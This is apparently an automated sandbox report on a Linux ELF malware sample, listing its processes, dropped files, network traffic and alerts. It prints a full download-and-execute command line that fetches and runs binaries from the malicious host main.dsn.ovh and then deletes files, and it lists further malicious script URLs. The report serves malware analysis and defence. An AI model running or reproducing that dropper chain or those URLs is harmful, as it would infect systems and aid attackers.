File name: a3a1adfcbc6207f3e6e0c35d3cf03904

Full analysis: https://app.any.run/tasks/afce41f6-c4b2-4698-a45a-382720793fae
Verdict: Malicious activity
Analysis date: October 18, 2024, 17:11:52
OS: Ubuntu 22.04.2
MIME: application/x-executable
File info: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, no section header
MD5: A3A1ADFCBC6207F3E6E0C35D3CF03904
SHA1: F10F7793D4D78120395D11D7020AB626995E2C01
SHA256: 2636F4D5FA29C3747036D385C3EEE167ABA1AAD58C29597D21DF7E42C6149A35
SSDEEP: 48:fVqwPZ68CoSgHeg/D1K139GUTdpTXT8fc0:fYwPZ68CEQ1tbTm

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Checks DMI information (probably VM detection)

      • sshd (PID: 13964)
      • udevadm (PID: 14007)
    • Reads /proc/mounts (likely used to find writable filesystems)

      • sshd (PID: 13964)
    • Modifies file or directory owner

      • sudo (PID: 13909)
    • Executes commands using command-line interpreter

      • sh (PID: 13923)
      • sudo (PID: 13914)
      • loadbit (PID: 14003)
      • sh (PID: 13915)
      • flock (PID: 13962)
      • cron (PID: 14055)
      • cron (PID: 14052)
    • Modifies Cron jobs

      • sh (PID: 13923)
      • sh (PID: 13955)
      • sh (PID: 13945)
    • Creates shell script file

      • wget (PID: 13952)
      • wget (PID: 13924)
      • wget (PID: 13977)
      • wget (PID: 13965)
      • wget (PID: 13942)
    • Uses wget to download content

      • sh (PID: 13915)
      • sh (PID: 13923)
      • sh (PID: 14002)
    • Potential Corporate Privacy Violation

      • wget (PID: 13933)
      • wget (PID: 13917)
      • wget (PID: 13985)
      • wget (PID: 13996)
      • wget (PID: 13999)
    • Executes the "rm" command to delete files or directories

      • sh (PID: 13923)
      • sh (PID: 13915)
      • sh (PID: 14004)
      • sh (PID: 14002)
    • Process requests binary or script from the Internet

      • wget (PID: 13936)
    • Intercepts program crashes

      • apport (PID: 13989)
    • Checks the user who created the process

      • cron (PID: 14052)
      • cron (PID: 14055)
    • Manipulating modules (likely to execute programs on system boot)

      • modprobe (PID: 14006)
  • INFO

    No info indicators.
No Malware configuration.

TRiD: .o | ELF Executable and Linkable format (generic) (100)

EXIF (EXE):
CPUArchitecture: 32 bit
CPUByteOrder: Little endian
ObjectFileType: Executable file
CPUType: i386
Total processes: 346
Monitored processes: 129
Malicious processes: 3
Suspicious processes: 1


Process information

PID: 13908
CMD: /bin/sh -c "sudo chown user /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904\.o && chmod +x /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904\.o && DISPLAY=:0 sudo -iu user /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904\.o "
Path: /bin/sh
Parent process: any-guest-agent
User: root
Integrity Level: UNKNOWN
Exit code: 1195

PID: 13909
CMD: sudo chown user /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904.o
Path: /usr/bin/sudo
Parent process: sh
User: root
Integrity Level: UNKNOWN
Exit code: 0

PID: 13912
CMD: chown user /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904.o
Path: /usr/bin/chown
Parent process: sudo
User: root
Integrity Level: UNKNOWN
Exit code: 0

PID: 13913
CMD: chmod +x /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904.o
Path: /usr/bin/chmod
Parent process: sh
User: root
Integrity Level: UNKNOWN
Exit code: 0

PID: 13914
CMD: sudo -iu user /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904.o
Path: /usr/bin/sudo
Parent process: sh
User: root
Integrity Level: UNKNOWN
Exit code: 1195

PID: 13915
CMD: /bin/sh -c "wget -nc http://main\.dsn\.ovh/dns/lovely -q -P /var/tmp/; chmod 777 /var/tmp/lovely; curl http://main\.dsn\.ovh/dns/lovely -s -o /var/tmp/lovely; chmod 777 /var/tmp/lovely; cd /var/tmp; \./lovely; cd /var/tmp; rm lovely; wget -nc http://main\.dsn\.ovh/dns/lushput -q -P /tmp/; chmod 777 /tmp/lushput; curl http://main\.dsn\.ovh/dns/lushput -s -o /tmp/lushput; chmod 777 /tmp/lushput; cd /tmp; \./lushput 'wget -nc http://main\.dsn\.ovh/dns/bitnow -q -P /var/tmp/; chmod 777 /var/tmp/bitnow; curl http://main\.dsn\.ovh/dns/bitnow -s -o /var/tmp/bitnow; chmod 777 /var/tmp/bitnow; cd /var/tmp; \./bitnow; cd /var/tmp; rm bitnow' 2>/dev/null; cd /tmp; rm -rf *; cd /tmp; rm -rf \.pkexec; wget -nc http://main\.dsn\.ovh/dns/seasbit -q -P /tmp/; chmod 777 /tmp/seasbit; curl http://main\.dsn\.ovh/dns/seasbit -s -o /tmp/seasbit; chmod 777 /tmp/seasbit; wget -nc http://main\.dsn\.ovh/dns/loadbit -q -P /tmp/; chmod 777 /tmp/loadbit; curl http://main\.dsn\.ovh/dns/loadbit -s -o /tmp/loadbit; chmod 777 /tmp/loadbit; cd /tmp; \./loadbit 2>/dev/null; cd /tmp; rm -rf *"
Path: /bin/sh
Parent process: sudo
User: user
Integrity Level: UNKNOWN
Exit code: 13920

PID: 13916
CMD: /usr/bin/locale-check C.UTF-8
Path: /usr/bin/locale-check
Parent process: sh
User: user
Integrity Level: UNKNOWN
Exit code: 0

PID: 13917
CMD: wget -nc http://main.dsn.ovh/dns/lovely -q -P /var/tmp/
Path: /usr/bin/wget
Parent process: sh
User: user
Integrity Level: UNKNOWN
Exit code: 482

PID: 13918
CMD: systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service
Path: /usr/bin/systemctl
Parent process: snapd
User: root
Integrity Level: UNKNOWN
Exit code: 482

PID: 13919
CMD: systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service
Path: /usr/bin/systemctl
Parent process: snapd
User: root
Integrity Level: UNKNOWN
Exit code: 482
Executable files: 0
Suspicious files: 3
Text files: 0
Unknown types: 0

Dropped files

PID   | Process | Filename        | Type
------|---------|-----------------|-------
13917 | wget    | /var/tmp/lovely | o
13933 | wget    | /var/tmp/sshd   | binary
13999 | wget    | /tmp/loadbit    | binary
HTTP(S) requests: 12
TCP/UDP connections: 28
DNS requests: 57
Threats: 6

HTTP requests

PID   | Process | Method | HTTP Code | IP               | URL                                   | CN      | Reputation
------|---------|--------|-----------|------------------|---------------------------------------|---------|------------
-     | -       | GET    | 204       | 91.189.91.98:80  | http://connectivity-check.ubuntu.com/ | unknown | whitelisted
13933 | wget    | GET    | -         | 188.114.96.3:80  | http://main.dsn.ovh/dns/sshd          | unknown | whitelisted
13924 | wget    | GET    | 200       | 188.114.97.3:80  | http://main.dsn.ovh/dns/unix.sh       | unknown | malicious
13942 | wget    | GET    | 200       | 188.114.97.3:80  | http://main.dsn.ovh/dns/truct.sh      | unknown | malicious
13952 | wget    | GET    | 200       | 188.114.97.3:80  | http://main.dsn.ovh/dns/brict.sh      | unknown | malicious
-     | -       | GET    | 200       | 188.114.96.3:80  | http://main.dsn.ovh/dns/retrict.sh    | unknown | malicious
13936 | wget    | GET    | 200       | 188.114.96.3:80  | http://main.dsn.ovh/dns/config.json   | unknown | malicious
13917 | wget    | GET    | 200       | 188.114.96.3:80  | http://main.dsn.ovh/dns/lovely        | unknown | malicious
13996 | wget    | GET    | 200       | 188.114.96.3:80  | http://main.dsn.ovh/dns/seasbit       | unknown | malicious
13977 | wget    | GET    | 200       | 188.114.97.3:80  | http://main.dsn.ovh/dns/politrict.sh  | unknown | malicious

Connections

PID   | Process      | IP                  | Domain                        | ASN                     | CN | Reputation
------|--------------|---------------------|-------------------------------|-------------------------|----|------------
470   | avahi-daemon | 224.0.0.251:5353    | -                             | -                       | -  | unknown
-     | -            | 185.125.190.48:80   | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted
-     | -            | 91.189.91.98:80     | connectivity-check.ubuntu.com | Canonical Group Limited | US | whitelisted
-     | -            | 169.150.255.180:443 | odrs.gnome.org                | -                       | GB | whitelisted
485   | snapd        | 185.125.188.55:443  | api.snapcraft.io              | Canonical Group Limited | GB | whitelisted
485   | snapd        | 185.125.188.59:443  | api.snapcraft.io              | Canonical Group Limited | GB | whitelisted
13917 | wget         | 188.114.96.3:80     | main.dsn.ovh                  | CLOUDFLARENET           | NL | malicious
13924 | wget         | 188.114.97.3:80     | main.dsn.ovh                  | CLOUDFLARENET           | NL | malicious
485   | snapd        | 185.125.188.58:443  | api.snapcraft.io              | Canonical Group Limited | GB | whitelisted
485   | snapd        | 185.125.188.54:443  | api.snapcraft.io              | Canonical Group Limited | GB | whitelisted

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
whitelisted
google.com
  • 142.250.184.238
  • 2a00:1450:4001:827::200e
whitelisted
odrs.gnome.org
whitelisted
api.snapcraft.io
whitelisted
main.dsn.ovh
  • 188.114.96.3
  • 188.114.97.3
  • 2a06:98c1:3121::3
  • 2a06:98c1:3120::3
malicious
61.100.168.192.in-addr.arpa
unknown
dash.dsn.ovh
  • 185.85.240.7
unknown
dash.cloudflare.ovh
unknown

Threats

PID   | Process | Class                                | Message
------|---------|--------------------------------------|-------------------------------------------------------------------
13917 | wget    | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP
13933 | wget    | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP
13985 | wget    | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP
13996 | wget    | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP
13999 | wget    | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP
No debug info